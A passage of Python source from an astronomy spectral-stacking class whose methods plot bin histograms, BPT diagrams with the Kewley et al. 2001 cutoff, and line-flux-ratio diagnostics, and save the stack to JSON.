None:\n fname = os.path.join(fname_root,\n f'{f[i]:.3f}_' + self[item].name.replace(' ', '_') + '.spectrum' + fmt)\n else:\n fname = os.path.join(fname_root, self[item].name.replace(' ', '_') + '.spectrum' + fmt)\n self[item].plot(fname=fname,\n backend=backend, _range=_range, ylim=ylim, title_text=ttl, plot_model=plot_model,\n shade_reg=shade_reg, normalized=normalized)\n print('Done.')\n\n def plot_hist(self, fname_base, plot_log=False, backend='plotly'):\n \"\"\"\n Plot a histogram of the spectra in each bin.\n\n :param fname_base: str\n File name pattern.\n :param plot_log: boolean\n If True, makes the y-axis logarithmic.\n :param backend: str\n Whether to use matplotlib or plotly to plot stuff\n :return None:\n \"\"\"\n fmt = '.html' if backend == 'plotly' else '.pdf'\n fname = fname_base + fmt\n widths = np.diff(self.bin_edges)\n midpts = (self.bin_edges[:-1] + self.bin_edges[1:]) / 2\n nbins = len(widths)\n if backend == 'pyplot':\n fig, ax = plt.subplots()\n ax.bar(midpts, self.bin_counts, widths, align='center', color='rebeccapurple',\n label='$n_{\\\\rm bins} = %d$' % nbins,\n log=plot_log)\n xlabel = '$\\\\log_{10}($' + self.binned + '$)$' if self.bin_log else self.binned\n ax.set_xlabel(xlabel)\n ax.set_ylabel('Number in bin')\n ax.legend()\n ax.set_xticks(self.bin_edges)\n fig.savefig(fname, dpi=300, bbox_inches='tight')\n elif backend == 'plotly':\n fig = plotly.graph_objects.Figure(data=plotly.graph_objects.Bar(x=midpts, y=self.bin_counts))\n fig.update_traces(marker_color='rgb(158,202,225)', marker_line_color='rgb(8,48,107)',\n marker_line_width=0.0, opacity=0.8)\n xlabel = '$\\\\log(' + self.binned + ')$' if self.bin_log else self.binned\n fig.update_layout(\n xaxis_title=xlabel,\n yaxis_title='Number in bin',\n hovermode='x',\n xaxis=dict(\n tickmode='array',\n tickvals=self.bin_edges\n ),\n template='plotly_white'\n )\n\n fig.update_layout(\n font_family=\"Georgia, Times New Roman, Serif\",\n # font_color=\"blue\",\n title_font_family=\"Georgia, Times New Roman, Serif\",\n # title_font_color=\"red\",\n # legend_title_font_color=\"green\"\n )\n fig.update_xaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n fig.update_yaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n\n if plot_log:\n fig.update_yaxes(\n type=\"log\",\n )\n fig.write_html(fname, include_mathjax=\"cdn\")\n # fig.write_image(fname.replace('.html', '.pdf'))\n\n def plot_agn(self, fname_base, bpt_x, bpt_y, bpt_xerr=None, bpt_yerr=None, labels=None, backend='plotly'):\n \"\"\"\n Plot galaxies in the stack on a BPT-diagram, assuming galaxies have the appropriate BPT data to do so.\n\n :param fname_base: str\n Filename exlcuding the extension.\n :param bpt_x: str\n The name of the BPT ratio for the x-axis.\n :param bpt_y: str\n The name of the BPT ratio for the y-axis.\n :param bpt_xerr: optional, str\n The name of the error in the x-axis BPT ratio. If not specified, no errorbars will be plotted.\n :param bpt_yerr: optional, str\n The name of the error in the y-axis BPT ratio. 
If not specified, no errorbars will be plotted.\n :param labels: iterable\n List of strings specifying the names of the x and y axes.\n :param backend: str\n 'plotly' or 'pyplot'\n :return:\n \"\"\"\n fmt = '.html' if backend == 'plotly' else '.pdf'\n fname = fname_base + fmt\n data = np.array(\n [(self[i].data[bpt_x], self[i].data[bpt_y], self[i].data['agn_frac']) for i in range(len(self))])\n x = data[:, 0]\n y = data[:, 1]\n z = data[:, 2]\n xerr = yerr = None\n if bpt_xerr:\n xerr = np.array([self[i].data[bpt_xerr] for i in range(len(self))])\n if bpt_yerr:\n yerr = np.array([self[i].data[bpt_yerr] for i in range(len(self))])\n if labels:\n xl, yl = labels\n else:\n xl, yl = bpt_x, bpt_y\n k01_x = np.linspace(np.nanmin(x), np.min([np.nanmax(x), 0.469]), 100)\n k01_y = 0.61 / (k01_x - 0.47) + 1.19\n if backend == 'pyplot':\n fig, ax = plt.subplots()\n ax.set_xlabel(xl)\n ax.set_ylabel(yl)\n scp = ax.errorbar(x, y, xerr=xerr, yerr=yerr, fmt='.', c=z, cmap='coolwarm')\n fig.colorbar(scp, ax=ax, label='AGN Fraction')\n ax.plot(k01_x, k01_y, 'k--', lw=.5, label='Kewley et al. 2001 Cutoff')\n ax.legend()\n fig.savefig(fname, dpi=300, bbox_inches='tight')\n elif backend == 'plotly':\n fig = plotly.graph_objects.Figure(\n data=plotly.graph_objects.Scatter(\n x=x, y=y, mode='markers',\n error_x=dict(type='data', array=xerr, visible=True),\n error_y=dict(type='data', array=yerr, visible=True),\n marker=dict(size=4, color=z, colorscale='bluered', showscale=True),\n showlegend=False, hovertemplate='(x: %{x:.5f}, y: %{y:.5f}),
    AGN_frac = %{marker.color:.5f}'\n )\n )\n fig.add_trace(\n plotly.graph_objects.Scatter(x=k01_x, y=k01_y, line=dict(color='black', width=.5, dash='dash'),\n name='Kewley et al. 2001 Cutoff', showlegend=False))\n fig.update_layout(\n xaxis_title=xl,\n yaxis_title=yl,\n title='Reference point: ({:.5f},{:.5f})'.format(*self.agn_ref_pt),\n template='plotly_white'\n )\n\n fig.update_layout(\n font_family=\"Georgia, Times New Roman, Serif\",\n # font_color=\"blue\",\n title_font_family=\"Georgia, Times New Roman, Serif\",\n # title_font_color=\"red\",\n # legend_title_font_color=\"green\"\n )\n fig.update_xaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n fig.update_yaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n\n fig.update_yaxes(\n range=(np.nanmin(y) - 0.05, np.nanmax(y) + 0.05),\n constrain='domain'\n )\n fig.update_xaxes(\n range=(np.nanmin(x) - 0.05, np.nanmax(x) + 0.05),\n constrain='domain'\n )\n fig.write_html(fname, include_mathjax=\"cdn\")\n # fig.write_image(fname.replace('.html', '.pdf'))\n\n def line_flux_report(self, fluxr_dict, line=6374, dw=10, norm_dw=(30, 30), plot_range=None, ratio_target=3,\n plot_backend='plotly', path='',\n agn_diagnostics=False, ylim=None, title_text_conf=None, title_text_snr=None, tag='',\n conf_dict=None, conf_target=None, inspect=None, plot_spec='none'):\n \"\"\"\n Plotting diagnostics for line flux ratio tests.\n\n :param fluxr_dict: dict\n Dictionary of results from a line flux test, as formatted by the calc_line_flux_ratios method.\n :param line: int, float\n The wavelength of the line that was integrated in fluxr_dict.\n :param dw: int, float\n Range of wavelengths to the left/right of line that was used in the integration of fluxr_dict.\n :param norm_dw: tuple\n Tuple with values for the number of angstroms to the left/right that the center of the comparison regions\n are from the center of the central region. For plotting purposes.\n :param plot_range: tuple\n wavelength limits on the plotted data\n :param ratio_target: int, float\n A cutoff of the integrated line flux above which to consider a galaxies a 'detection'\n :param plot_backend: str\n 'pyplot' or 'plotly'\n :param path: str\n Output path for plots.\n :param agn_diagnostics: boolean\n If True, calculate the Kewley et al. 2001 criteria for spectra and print comparisons to those detected by\n the line flux tests. Requires spectra to have BPT data ALREADY CALCULATED.\n :param ylim: optional, tuple\n Plot y-limits to be passed to the plot_spectra method.\n :param tag: optional, str\n A tag to append to the end of saved files.\n :param title_text_conf: optional, str\n Name of the a priori confidence value of a spectrum. Must be in the Spectrum's data dictionary.\n :param title_text_snr: optional, str\n Name of the SNR value of a spectrum. Must be in the Spectrum's data dictionary.\n :param conf_dict: optional, dict\n A priori confidence levels for each spectra, as formatted by the calc_line_flux_ratios method.\n :param conf_target: optional, float\n Required if conf_dict is provided and plot_spec is 'sorted'. 
The target confidence level above which\n something is considered a true positive.\n :param inspect: str\n Key for a value in the data dictionary that has an additional property to be plotted on the color axis of\n the confidence covariance plots.\n :param plot_spec: str\n 'none', 'all', 'detections', or 'sorted' to plot none, all, only those individual spectra that satisfy the\n detection criterion, or all in sorted sub-folders\n :return ss: list of np.ndarray\n The names of all the spectra that passed the detection criterion for each bin.\n \"\"\"\n self._line_flux_diagnostics(fluxr_dict, line, dw, plot_backend=plot_backend, title_text_snr=title_text_snr,\n conf_dict=conf_dict,\n inspect=inspect, path=path)\n ss = []\n\n ratios = np.array([fluxr_dict[key] for key in fluxr_dict])\n specnames = np.array([key for key in fluxr_dict], dtype=object)\n\n good = [np.where((self[s].wave > line - dw) & (self[s].wave < line + dw))[0] for s in specnames]\n amps = np.zeros(specnames.size)\n amps_dict = {}\n for j, s in enumerate(specnames):\n if good[j].size > 1:\n f = np.nanmax(self[s].flux[good[j]]) - 1\n amps[j] = f\n amps_dict[s] = f\n else:\n amps_dict[s] = 0.\n\n if title_text_conf:\n confidences = np.array([self[sn].data[title_text_conf] for sn in specnames])\n # ind = ratios.argsort()[-5:][::-1]\n w = np.where(ratios >= ratio_target)[0]\n print(len(w), f' galaxies fulfill the threshold of {ratio_target}:')\n print(specnames[w])\n if agn_diagnostics:\n kew = np.array([self[i].data['agn_class'] for i in specnames])\n # ~kew is the element-wise negation; the previous 'kew is False' compared object identity and was always False\n kw = np.where(~kew & (ratios >= ratio_target))[0]\n print(f'Of these, {len(kw)} did NOT satisfy the Kewley et al. 2001 criteria: ')\n print(specnames[kw])\n ss.append(specnames[w])\n if title_text_snr:\n snrs = np.array([self[si].data[title_text_snr] for si in specnames])\n if not title_text_conf:\n tt = {s: r'$\mathcal{F}=%.3f$' % r for s, r in zip(specnames, ratios)}\n elif not title_text_snr:\n tt = {s: r'$\mathcal{F}=%.3f$; $conf=%.3f$' % (r, c) for s, r, c in\n zip(specnames, ratios, confidences)}\n else:\n tt = {s: r'$\mathcal{F}=%.3f$; $conf=%.3f$; $SNR=%.3f$, $A*SNR=%.3f$' % (r, c, snr, a * snr) for\n s, r, c, snr, a in zip(specnames, ratios, confidences, snrs, amps)}\n if title_text_conf:\n tp = np.where((ratios >= ratio_target) & (confidences >= conf_target))[0]\n fp = np.where((ratios >= ratio_target) & (confidences < conf_target))[0]\n tn = np.where((ratios < ratio_target) & (confidences < conf_target))[0]\n fn = np.where((ratios < ratio_target) & (confidences >= conf_target))[0]\n ntp = len(tp)\n nfp = len(fp)\n ntn = len(tn)\n nfn = len(fn)\n tpsnr = np.nanmedian([self[ispec].data[title_text_snr] for ispec in specnames[tp]])\n fpsnr = np.nanmedian([self[ispec].data[title_text_snr] for ispec in specnames[fp]])\n tnsnr = np.nanmedian([self[ispec].data[title_text_snr] for ispec in specnames[tn]])\n fnsnr = np.nanmedian([self[ispec].data[title_text_snr] for ispec in specnames[fn]])\n tpasnr = np.nanmedian([self[ispec].data[title_text_snr] * amps_dict[ispec] for ispec in specnames[tp]])\n fpasnr = np.nanmedian([self[ispec].data[title_text_snr] * amps_dict[ispec] for ispec in specnames[fp]])\n tnasnr = np.nanmedian([self[ispec].data[title_text_snr] * amps_dict[ispec] for ispec in specnames[tn]])\n fnasnr = np.nanmedian([self[ispec].data[title_text_snr] * amps_dict[ispec] for ispec in specnames[fn]])\n with open(os.path.join(path, 'report_' + str(line) + '_' + tag + '.txt'), 'w') as file:\n file.write('tp: ' + str(ntp) + ', med SNR: ' + str(tpsnr) + ', med A*SNR: ' + 
str(tpasnr) + '\\n')\n file.write('fp: ' + str(nfp) + ', med SNR: ' + str(fpsnr) + ', med A*SNR: ' + str(fpasnr) + '\\n')\n file.write('tn: ' + str(ntn) + ', med SNR: ' + str(tnsnr) + ', med A*SNR: ' + str(tnasnr) + '\\n')\n file.write('fn: ' + str(nfn) + ', med SNR: ' + str(fnsnr) + ', med A*SNR: ' + str(fnasnr) + '\\n')\n else:\n with open(os.path.join(path, 'report_' + str(line) + '_' + tag + '.txt'), 'w') as file:\n file.write('number integrated: ' + str(len(specnames)) + '\\n')\n file.write('detections: ' + str(len(specnames[w])) + '\\n')\n file.write('non-detections: ' + str(len(specnames) - len(specnames[w])) + '\\n')\n if plot_spec != 'none':\n if plot_spec == 'sorted':\n if conf_dict is not None:\n tp = np.where((ratios >= ratio_target) & (confidences >= conf_target))[0]\n fp = np.where((ratios >= ratio_target) & (confidences < conf_target))[0]\n tn = np.where((ratios < ratio_target) & (confidences < conf_target))[0]\n fn = np.where((ratios < ratio_target) & (confidences >= conf_target))[0]\n name_list = [specnames[tp], specnames[fp], specnames[tn], specnames[fn]]\n ratio_list = [ratios[tp], ratios[fp], ratios[tn], ratios[fn]]\n path_list = ['true_positives_' + str(line), 'false_positives+' + str(line),\n 'true_negatives_' + str(line), 'false_negatives_' + str(line)]\n else:\n nw = np.where(ratios < ratio_target)[0]\n name_list = [specnames[w], specnames[nw]]\n ratio_list = [ratios[w], ratios[nw]]\n path_list = ['detections', 'non-detections']\n elif plot_spec == 'all':\n name_list = [specnames]\n ratio_list = [ratios]\n path_list = ['spectra_' + str(line)]\n elif plot_spec == 'detections':\n name_list = [specnames[w]]\n ratio_list = [ratios[w]]\n path_list = ['detections_' + str(line)]\n else:\n raise ValueError('invalid plot_spec option')\n for names, rts, pathi in zip(name_list, ratio_list, path_list):\n shade = [(line - dw, line + dw), (line - norm_dw[0] - dw, line - norm_dw[0] + dw),\n (line + norm_dw[1] - dw, line + norm_dw[1] + dw)]\n self.plot_spectra(os.path.join(path, pathi), names, _range=plot_range, ylim=ylim,\n backend=plot_backend,\n title_text=tt, f=None, shade_reg=shade)\n return ss\n\n def _line_flux_diagnostics(self, fluxr_dict, line=6374, dw=5, title_text_snr=None, plot_backend='pyplot',\n conf_dict=None,\n inspect=None, path=''):\n # 10^-17 erg s^-1 cm^-2 (not per angstrom after integration)\n # Get data\n ratios = np.array(list(fluxr_dict.values()))\n specnames = np.array(list(fluxr_dict.keys()))\n good = [np.where((self[s].wave > line - dw) & (self[s].wave < line + dw))[0] for s in specnames]\n amps = np.zeros(specnames.size)\n for j, s in enumerate(specnames):\n if good[j].size > 1:\n amps[j] = np.nanmax(self[s].flux[good[j]]) - 1\n inspections = None\n if inspect:\n inspections = np.array([self[si].data[inspect] for si in specnames])\n snrs = None\n if title_text_snr:\n snrs = np.array([self[si].data[title_text_snr] for si in specnames])\n # stack_fluxes.append(fluxr_dict[i]['stack'][0])\n\n # Get mins/maxes\n # lstr = len(list(fluxr_dict[0].keys())[0])\n\n # for j in range(len(fluxr_dict)):\n minrind = np.nanargmin(ratios)\n min2rind = np.nanargmin(np.delete(ratios, minrind))\n maxrind = np.nanargmax(ratios)\n max2rind = np.nanargmax(np.delete(ratios, maxrind))\n maxr = (ratios[maxrind], np.delete(ratios, maxrind)[max2rind])\n minr = (ratios[minrind], np.delete(ratios, minrind)[min2rind])\n maxs = (specnames[maxrind], np.delete(specnames, maxrind)[max2rind])\n mins = (specnames[minrind], np.delete(specnames, minrind)[min2rind])\n\n reg = (line - dw * 2, 
line + dw * 2)\n if plot_backend == 'pyplot':\n # Set up a gridspec\n fig = plt.figure(constrained_layout=True)\n gs = fig.add_gridspec(3, 3)\n # Main flux ratio plot\n ratioplot = fig.add_subplot(gs[0:2, 0:2])\n ratioplot.hist(ratios, bins=np.arange(0, 3.2, 0.2), density=False)\n ratioplot.set_yscale('log')\n ratioplot.set_xlabel('Line flux / Stacked line flux')\n ratioplot.set_ylabel('Number in bin')\n # ratioplot.set_title('Stacked line flux $= %.3f' % stack_fluxes[k])\n # ratioplot.set_ylim(0, 3)\n\n small = []\n big = []\n for m in range(2):\n # 2 smallest line ratios' profiles\n good1 = np.where((reg[0] < self[mins[m]].wave) & (self[mins[m]].wave < reg[1]))[0]\n small1 = fig.add_subplot(gs[2, m])\n small1.plot(self[mins[m]].wave[good1], self[mins[m]].flux[good1], 'k-')\n small1.fill_between(self[mins[m]].wave[good1],\n self[mins[m]].flux[good1] - self[mins[m]].error[good1],\n self[mins[m]].flux[good1] + self[mins[m]].error[good1],\n color='mediumaquamarine', alpha=0.5)\n small1.axvline(line, linestyle='--', color='k')\n small1.axvspan(line - dw, line + dw, color='slategrey', alpha=0.5)\n ttl = mins[m] if len(mins[m]) <= 10 else mins[m][0:10] + '...'\n small1.set_title(ttl)\n small1.set_xticks([line - dw, line + dw])\n if m == 0:\n small1.set_ylabel('Norm. Flux')\n elif m == 1:\n small1.set_xlabel('Wavelength [${\\\\rm \\\\AA}$]')\n small.append(small1)\n # 2 largest line ratios' profiles\n good2 = np.where((reg[0] < self[maxs[m]].wave) & (self[maxs[m]].wave < reg[1]))[0]\n big1 = fig.add_subplot(gs[m, 2])\n big1.plot(self[maxs[m]].wave[good2], self[maxs[m]].flux[good2], 'k-')\n big1.fill_between(self[maxs[m]].wave[good2],\n self[maxs[m]].flux[good2] - self[maxs[m]].error[good2],\n self[maxs[m]].flux[good2] + self[maxs[m]].error[good2],\n color='mediumaquamarine', alpha=0.5)\n big1.axvline(line, linestyle='--', color='k')\n big1.axvspan(line - dw, line + dw, color='slategrey', alpha=0.5)\n ttl = maxs[m] if len(maxs[m]) <= 10 else maxs[m][0:10] + '...'\n big1.set_title(ttl)\n big1.set_xticks([line - dw, line + dw])\n big.append(big1)\n\n # Stack line profile\n # stack = fig.add_subplot(gs[2, 2])\n # good = np.where((reg[0] < self.universal_grid[k]) & (self.universal_grid[k] < reg[1]))[0]\n # stack.plot(self.universal_grid[k][good], self.stacked_flux[k][good], 'k-')\n # stack.fill_between(self.universal_grid[k][good],\n # self.stacked_flux[k][good]-self.stacked_err[k][good],\n # self.stacked_flux[k][good]+self.stacked_err[k][good],\n # color='mediumaquamarine', alpha=0.5)\n # stack.axvline(line, linestyle='--', color='k')\n # stack.axvspan(line-dw, line+dw, color='slategrey', alpha=0.5)\n # stack.set_xticks([line-dw, line+dw])\n\n # Axis sharing\n big[0].sharex(big[1])\n # stack.sharex(big[0])\n small[0].sharex(big[0])\n small[1].sharex(small[0])\n big[0].sharey(big[1])\n # stack.sharey(big[0])\n small[0].sharey(big[0])\n small[1].sharey(small[0])\n\n # stack.set_title('Stack')\n fig.savefig(path + os.sep + 'line_flux_ratios.pdf', dpi=300)\n plt.close()\n\n if conf_dict:\n\n confidences = np.array([conf_dict[fi] for fi in conf_dict if fi != 'stack'])\n\n # Sort\n isort = np.argsort(confidences)\n confidences = confidences[isort]\n ratios = ratios[isort]\n amps = amps[isort]\n snrs = snrs[isort]\n asnr = amps * snrs\n if inspect:\n inspections = inspections[isort]\n\n std = np.nanstd(ratios)\n median = np.nanmedian(ratios)\n good = np.where((np.abs(ratios - median) < 3 * std) & (\n np.isfinite(confidences) & np.isfinite(ratios)))[0]\n ratios = ratios[good]\n confidences = 
confidences[good]\n asnr = asnr[good]\n\n # ntop = int(.2*len(ratios[k]))\n # rsort = np.argsort(ratios[k])\n # top20 = ratios[k][rsort][len(ratios[k])-ntop:]\n # top20c = confidences[k][rsort][len(ratios[k])-ntop:]\n\n A = np.vstack((confidences, np.ones_like(confidences))).T\n m, c = np.linalg.lstsq(A, ratios, rcond=None)[0]\n x_model = np.linspace(confidences[0], confidences[-1], 1000)\n y_model = m * x_model + c\n\n fig, ax = plt.subplots()\n # scatter (not plot) accepts per-point colors and returns the mappable that colorbar requires\n dataplot = ax.scatter(confidences, ratios, marker='.', c=asnr if not inspect else inspections,\n cmap='winter')\n fig.colorbar(dataplot, ax=ax, label='$A*SNR$' if not inspect else 'Inspections')\n # ax.plot(top20c, top20, '.', color='cyan', label='Top 20%')\n ax.plot(x_model, y_model, 'k--', label='Least-squares fit')\n ax.legend()\n ax.set_title(r'Linear Least Squares Fit: $m=%.3f$, $b=%.3f$' % (m, c))\n ax.set_xlabel('Confidence Level')\n ax.set_ylabel(r'Line Flux Ratio Parameter $\mathcal{F}$')\n # ax.set_ylim(-10, 10)\n fig.savefig(path + os.sep + 'line_flux_confidence_covar.pdf', dpi=300)\n plt.close()\n\n elif plot_backend == 'plotly':\n\n ttl1 = maxs[0] if len(maxs[0]) <= 10 else maxs[0][0:10] + '...'\n ttl2 = maxs[1] if len(maxs[1]) <= 10 else maxs[1][0:10] + '...'\n ttl3 = mins[0] if len(mins[0]) <= 10 else mins[0][0:10] + '...'\n ttl4 = mins[1] if len(mins[1]) <= 10 else mins[1][0:10] + '...'\n fig = plotly.subplots.make_subplots(rows=3, cols=3,\n specs=[[{\"rowspan\": 2, \"colspan\": 2}, None, {}],\n [None, None, {}],\n [{}, {}, {}]],\n subplot_titles=['',\n ttl1, ttl2, ttl3, ttl4, 'Stack'])\n fig.add_trace(plotly.graph_objects.Histogram(x=ratios, xbins=dict(start=0, end=max(ratios),\n size=max(ratios)/10)), row=1,\n col=1)\n fig.update_traces(marker_color='rgb(158,202,225)', marker_line_color='rgb(8,48,107)',\n marker_line_width=0.0, opacity=0.8, row=1, col=1)\n fig.update_layout(\n yaxis=dict(type='log'),\n yaxis_title_text='Number in bin',\n xaxis_title_text='Line flux / stacked line flux',\n template='plotly_white'\n # title_text='Stacked line flux $= %.3f \\\\times 10^{-17}$ erg s$^{-1}$ cm$^{-2}$' % stack_fluxes[k],\n )\n linewidth = .5\n maxy = -9999\n miny = 9999\n for m in range(2):\n good1 = np.where((reg[0] < self[mins[m]].wave) & (self[mins[m]].wave < reg[1]) &\n np.isfinite(self[mins[m]].flux) & np.isfinite(self[mins[m]].error))[0]\n fig.add_trace(\n plotly.graph_objects.Scatter(x=self[mins[m]].wave[good1], y=self[mins[m]].flux[good1],\n line=dict(color='black', width=linewidth),\n name='Data', showlegend=False), row=3, col=m + 1)\n fig.add_trace(plotly.graph_objects.Scatter(x=self[mins[m]].wave[good1],\n y=self[mins[m]].flux[good1] + self[mins[m]].error[\n good1],\n line=dict(color='#60dbbd', width=0),\n fillcolor='rgba(96, 219, 189, 0.6)',\n name='Upper Bound', showlegend=False), row=3, col=m + 1)\n fig.add_trace(plotly.graph_objects.Scatter(x=self[mins[m]].wave[good1],\n y=self[mins[m]].flux[good1] - self[mins[m]].error[\n good1],\n line=dict(color='#60dbbd', width=0),\n fillcolor='rgba(96, 219, 189, 0.6)',\n fill='tonexty', name='Lower Bound', showlegend=False),\n row=3, col=m + 1)\n fig.add_vline(x=line, line_width=2 * linewidth, line_dash='dot', line_color='#226666', row=3,\n col=m + 1)\n n = m + 4\n fig['layout']['xaxis' + str(n)]['tickmode'] = 'array'\n fig['layout']['xaxis' + str(n)]['tickvals'] = [line - dw, line + dw]\n # fig['layout']['title'+str(n)]['text'] = mins[m, k]\n if m == 0:\n fig['layout']['yaxis' + str(n)]['title_text'] = 'Norm. 
Flux'\n elif m == 1:\n fig['layout']['xaxis' + str(n)]['title_text'] = 'Wavelength [Å]'\n maxiy = np.nanmax(self[mins[m]].flux[good1]) + .5\n miniy = np.nanmin(self[mins[m]].flux[good1]) - .5\n if maxiy > maxy:\n maxy = maxiy\n if miniy < miny:\n miny = miniy\n good2 = np.where((reg[0] < self[maxs[m]].wave) & (self[maxs[m]].wave < reg[1]))[0]\n fig.add_trace(\n plotly.graph_objects.Scatter(x=self[maxs[m]].wave[good2], y=self[maxs[m]].flux[good2],\n line=dict(color='black', width=linewidth),\n name='Data', showlegend=False), row=m + 1, col=3)\n fig.add_trace(plotly.graph_objects.Scatter(x=self[maxs[m]].wave[good2],\n y=self[maxs[m]].flux[good2] + self[maxs[m]].error[\n good2],\n line=dict(color='#60dbbd', width=0),\n fillcolor='rgba(96, 219, 189, 0.6)',\n name='Upper Bound', showlegend=False), row=m + 1, col=3)\n fig.add_trace(plotly.graph_objects.Scatter(x=self[maxs[m]].wave[good2],\n y=self[maxs[m]].flux[good2] - self[maxs[m]].error[\n good2],\n line=dict(color='#60dbbd', width=0),\n fillcolor='rgba(96, 219, 189, 0.6)',\n fill='tonexty', name='Lower Bound', showlegend=False),\n row=m + 1, col=3)\n fig.add_vline(x=line, line_width=2 * linewidth, line_dash='dot', line_color='#226666', row=m + 1,\n col=3)\n n2 = m + 2\n fig['layout']['xaxis' + str(n2)]['tickmode'] = 'array'\n fig['layout']['xaxis' + str(n2)]['tickvals'] = [line - dw, line + dw]\n # fig['layout']['title'+str(n2)]['text'] = maxs[m, k]\n maxiy = np.nanmax(self[maxs[m]].flux[good2]) + .5\n miniy = np.nanmin(self[maxs[m]].flux[good2]) - .5\n if maxiy > maxy:\n maxy = maxiy\n if miniy < miny:\n miny = miniy\n\n # good = np.where((reg[0] < self.universal_grid[k]) & (self.universal_grid[k] < reg[1]))[0]\n # fig.add_trace(plotly.graph_objects.Scatter(x=self.universal_grid[k][good], y=self.stacked_flux[k][good],\n # line=dict(color='black', width=linewidth),\n # name='Data', showlegend=False), row=3, col=3)\n # fig.add_trace(plotly.graph_objects.Scatter(x=self.universal_grid[k][good],\n # y=self.stacked_flux[k][good] + self.stacked_err[k][good],\n # line=dict(color='#60dbbd', width=0),\n # fillcolor='rgba(96, 219, 189, 0.6)',\n # name='Upper Bound', showlegend=False), row=3, col=3)\n # fig.add_trace(plotly.graph_objects.Scatter(x=self.universal_grid[k][good],\n # y=self.stacked_flux[k][good] - self.stacked_err[k][good],\n # line=dict(color='#60dbbd', width=0),\n # fillcolor='rgba(96, 219, 189, 0.6)',\n # fill='tonexty', name='Lower Bound', showlegend=False), row=3, col=3)\n # fig.add_vline(x=line, line_width=2 * linewidth, line_dash='dot', line_color='#226666', row=3, col=3)\n # fig['layout']['text'+str(6)] = 'Stack'\n fig['layout']['xaxis' + str(6)]['tickmode'] = 'array'\n fig['layout']['xaxis' + str(6)]['tickvals'] = [line - dw, line + dw]\n for i in range(2, 6):\n fig['layout']['yaxis' + str(i)]['range'] = (miny, maxy)\n fig['layout']['yaxis' + str(i)]['constrain'] = 'domain'\n fig['layout']['xaxis' + str(i)]['range'] = (line - 2 * dw, line + 2 * dw)\n fig['layout']['xaxis' + str(i)]['constrain'] = 'domain'\n fig.add_shape(type='rect', xref='x' + str(i), yref='y' + str(i), x0=line - dw, y0=miny,\n x1=line + dw, y1=maxy, fillcolor='lightgrey', opacity=0.5,\n line_width=0, layer='below')\n\n fig.update_layout(\n font_family=\"Georgia, Times New Roman, Serif\",\n # font_color=\"blue\",\n title_font_family=\"Georgia, Times New Roman, Serif\",\n # title_font_color=\"red\",\n # legend_title_font_color=\"green\"\n )\n fig.update_xaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n fig.update_yaxes(title_font_family=\"Georgia, 
Times New Roman, Serif\")\n\n fig.write_html(path + os.sep + 'line_flux_ratios.html', include_mathjax=\"cdn\")\n # fig.write_image(path + os.sep + 'line_flux_ratios_' + str(k) + '.pdf')\n\n if conf_dict:\n\n confidences = np.array([conf_dict[fi] for fi in conf_dict if fi != 'stack'])\n\n # Sort\n isort = np.argsort(confidences)\n confidences = confidences[isort]\n ratios = ratios[isort]\n amps = amps[isort]\n snrs = snrs[isort]\n asnr = amps * snrs\n if inspect:\n inspections = inspections[isort]\n\n std = np.nanstd(ratios)\n median = np.nanmedian(ratios)\n good = np.where((np.abs(ratios - median) < 3 * std) & (\n np.isfinite(confidences) & np.isfinite(ratios)))[0]\n ratios = ratios[good]\n confidences = confidences[good]\n asnr = asnr[good]\n\n # ntop = int(.2 * len(ratios[k]))\n # rsort = np.argsort(ratios[k])\n # top20 = ratios[k][rsort][len(ratios[k]) - ntop:]\n # top20c = confidences[k][rsort][len(ratios[k]) - ntop:]\n\n A = np.vstack((confidences, np.ones_like(confidences))).T\n m, c = np.linalg.lstsq(A, ratios, rcond=None)[0]\n x_model = np.linspace(confidences[0], confidences[-1], 1000)\n y_model = m * x_model + c\n\n fig = plotly.subplots.make_subplots(rows=1, cols=1)\n fig.add_trace(plotly.graph_objects.Scatter(\n x=confidences, y=ratios, mode='markers',\n marker=dict(size=4,\n color=asnr if not inspect else inspections,\n colorbar=dict(title=\"$A \\\\times SNR$\" if not inspect else \"Inspections\"),\n colorscale=\"ice\" if not inspect else \"spectral\",\n cmin=0 if not inspect else -1,\n cmax=4 if not inspect else 1),\n showlegend=False))\n # fig.add_trace(plotly.graph_objects.Scatter(x=top20c, y=top20, mode='markers',\n # marker=dict(size=4, color='#48CADB'), showlegend=False))\n fig.add_trace(plotly.graph_objects.Scatter(x=x_model, y=y_model,\n line=dict(color='black', width=.5, dash='dash'),\n showlegend=False))\n fig.update_layout(\n template='plotly_white',\n title='Linear Least Squares Fit: m=%.3f, b=%.3f' % (m, c),\n xaxis_title='Confidence Level',\n yaxis_title='${\\\\rm Line Flux Ratio Parameter}\\\\ \\\\mathcal{F}$',\n # yaxis_range=(-10, 10),\n # yaxis_constrain='domain'\n )\n\n fig.update_layout(\n font_family=\"Georgia, Times New Roman, Serif\",\n # font_color=\"blue\",\n title_font_family=\"Georgia, Times New Roman, Serif\",\n # title_font_color=\"red\",\n # legend_title_font_color=\"green\"\n )\n fig.update_xaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n fig.update_yaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n\n fig.write_html(path + os.sep + 'line_flux_confidence_covar.html',\n include_mathjax=\"cdn\")\n # fig.write_image(path + os.sep + 'line_flux_confidence_covar_' + str(k) + '.pdf')\n\n else:\n raise NotImplementedError\n\n def save_json(self, filepath):\n \"\"\"\n Spectra.save_json but also converts universal_grid, stacked_flux, and stacked_err to lists.\n \"\"\"\n with open(filepath, 'w') as handle:\n serializable = copy.deepcopy(self)\n for key in serializable.keys():\n serializable[key].wave = serializable[key].wave.tolist()\n serializable[key].flux = serializable[key].flux.tolist()\n serializable[key].error = serializable[key].error.tolist()\n serializable.universal_grid = serializable.universal_grid.tolist()\n serializable.stacked_flux = serializable.stacked_flux.tolist()\n serializable.stacked_err = serializable.stacked_err.tolist()\n serializable.filters = [str(f) for f in serializable.filters]\n serializable = serializable.__dict__\n serialized = json.dumps(serializable, indent=4)\n handle.write(serialized)\n\n def 
